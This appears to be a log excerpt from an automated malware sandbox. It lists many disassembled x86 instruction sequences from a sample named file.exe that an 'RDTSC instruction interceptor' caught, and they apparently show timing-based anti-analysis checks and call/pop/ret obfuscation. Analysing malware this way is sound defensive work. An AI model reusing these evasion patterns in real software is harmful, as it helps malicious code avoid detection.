                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C13F9 second address: 13C145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FFAE8D89398h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007FFAE8D89398h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 xchg eax, ebx 0x00000041 jmp 00007FFAE8D8939Bh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push edi 0x0000004a jnl 00007FFAE8D89396h 0x00000050 pop edi 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1DC3 second address: 13C1E53 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAE8D0C6B8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FFAE8D0C6B8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 or dword ptr [ebp+124588C1h], edi 0x0000002f push 00000000h 0x00000031 mov esi, dword ptr [ebp+122D1BE8h] 0x00000037 pushad 0x00000038 je 00007FFAE8D0C6B9h 0x0000003e mov di, bx 0x00000041 jmp 00007FFAE8D0C6C0h 0x00000046 popad 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push esi 0x0000004c call 00007FFAE8D0C6B8h 0x00000051 pop esi 0x00000052 mov dword ptr [esp+04h], esi 0x00000056 add dword ptr [esp+04h], 00000019h 0x0000005e inc esi 0x0000005f push esi 0x00000060 ret 0x00000061 pop esi 0x00000062 ret 0x00000063 xchg eax, ebx 0x00000064 jng 00007FFAE8D0C6C2h 0x0000006a jnc 00007FFAE8D0C6BCh 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1B65 second address: 13C1B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1E53 second address: 13C1E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFAE8D0C6B6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2A07 second address: 13C2A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAE8D8939Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2A15 second address: 13C2A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2A19 second address: 13C2A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FFAE8D893A7h 0x00000010 mov esi, dword ptr [ebp+122D2CBEh] 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FFAE8D89398h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1867h], ebx 0x00000039 push 00000000h 0x0000003b xchg eax, ebx 0x0000003c jmp 00007FFAE8D8939Dh 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2A85 second address: 13C2A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C61BA second address: 13C6222 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007FFAE8D89396h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FFAE8D89398h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov di, EF47h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FFAE8D89398h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov bx, 0B9Bh 0x0000004b push 00000000h 0x0000004d sbb bx, 2224h 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push edi 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6222 second address: 13C6227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6227 second address: 13C622C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7273 second address: 13C727D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAE8D0C6BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C63D4 second address: 13C63D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C916C second address: 13C9173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9173 second address: 13C9179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9179 second address: 13C919D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAE8D0C6C8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CA16A second address: 13CA16E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C92EE second address: 13C9379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D38EDh], esi 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FFAE8D0C6B8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 jmp 00007FFAE8D0C6C5h 0x0000003c mov eax, dword ptr [ebp+122D08F9h] 0x00000042 mov edi, dword ptr [ebp+122D2B13h] 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007FFAE8D0C6B8h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Dh 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 stc 0x00000065 push eax 0x00000066 push edi 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDA3F second address: 13CDA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D175D second address: 13D1761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D1761 second address: 13D1767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3821 second address: 13D3826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3826 second address: 13D382C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D382C second address: 13D3850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE8D0C6BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FFAE8D0C6BCh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3850 second address: 13D385A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FFAE8D89396h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D385A second address: 13D385E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0932 second address: 13D0938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0938 second address: 13D093E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D09F2 second address: 13D09F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D68D5 second address: 13D6906 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAE8D0C6BDh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 js 00007FFAE8D0C6B6h 0x0000001a jp 00007FFAE8D0C6B6h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6F97 second address: 13D702E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ecx 0x00000009 jp 00007FFAE8D8939Ch 0x0000000f pop ecx 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D2A8Bh] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FFAE8D89398h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007FFAE8D89398h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f push ebx 0x00000050 pushad 0x00000051 or edi, 19C2E7DBh 0x00000057 call 00007FFAE8D893A2h 0x0000005c pop edi 0x0000005d popad 0x0000005e pop edi 0x0000005f mov dword ptr [ebp+1246ADDFh], edx 0x00000065 xchg eax, esi 0x00000066 push eax 0x00000067 jng 00007FFAE8D8939Ch 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D702E second address: 13D7057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FFAE8D0C6C0h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFAE8D0C6BCh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C36A second address: 136C385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE8D893A3h 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF195 second address: 13DF1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAE8D0C6C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF1B4 second address: 13DF1E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFAE8D89396h 0x00000008 jmp 00007FFAE8D893A3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFAE8D893A4h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF38E second address: 13DF392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2E56 second address: 13E2E74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAE8D893A6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2E74 second address: 13E2E90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE8D0C6C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2E90 second address: 13E2E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2E94 second address: 13E2EEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FFAE8D0C6C8h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jc 00007FFAE8D0C6BEh 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007FFAE8D0C6BCh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FFAE8D0C6BDh 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2FD0 second address: 13E2FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2FD4 second address: 13E2FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2FE0 second address: 13E2FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jnc 00007FFAE8D89398h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2FF7 second address: 13E2FFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2FFB second address: 13E3024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FFAE8D893A3h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007FFAE8D89396h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E65F9 second address: 13E65FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E65FF second address: 13E6603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6603 second address: 13E6607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6607 second address: 13E660F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E660F second address: 13E6620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FFAE8D0C6B6h 0x00000009 jl 00007FFAE8D0C6B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6620 second address: 13E664F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jp 00007FFAE8D89396h 0x00000012 jmp 00007FFAE8D8939Ch 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FFAE8D8939Ah 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E664F second address: 13E665C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FFAE9061D66h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136FABC second address: 136FAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB0E5 second address: 13EB111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push esi 0x00000008 jnp 00007FFAE9061D66h 0x0000000e jmp 00007FFAE9061D6Ah 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFAE9061D6Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB111 second address: 13EB115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB115 second address: 13EB11B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB293 second address: 13EB297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB297 second address: 13EB2CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FFAE9061D79h 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007FFAE9061D6Eh 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop esi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5FE7 second address: 13F6000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FFAE903A96Bh 0x0000000b jne 00007FFAE903A966h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4B64 second address: 13F4B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFAE9061D66h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4B76 second address: 13F4B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4B7A second address: 13F4B84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4B84 second address: 13F4B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4D0B second address: 13F4D10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4D10 second address: 13F4D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4D1C second address: 13F4D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4D22 second address: 13F4D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4D26 second address: 13F4D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4D2A second address: 13F4D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jp 00007FFAE903A966h 0x0000000d pop edi 0x0000000e jmp 00007FFAE903A973h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFAE903A974h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4F05 second address: 13F4F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D78h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4F27 second address: 13F4F3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FFAE903A96Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F488D second address: 13F4893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F55FE second address: 13F562F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007FFAE903A978h 0x0000000b jmp 00007FFAE903A970h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFAE903A972h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F562F second address: 13F565D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAE9061D79h 0x0000000e jmp 00007FFAE9061D6Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F57CF second address: 13F57F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A973h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jo 00007FFAE903A966h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F57F1 second address: 13F5803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FFAE9061D6Ah 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
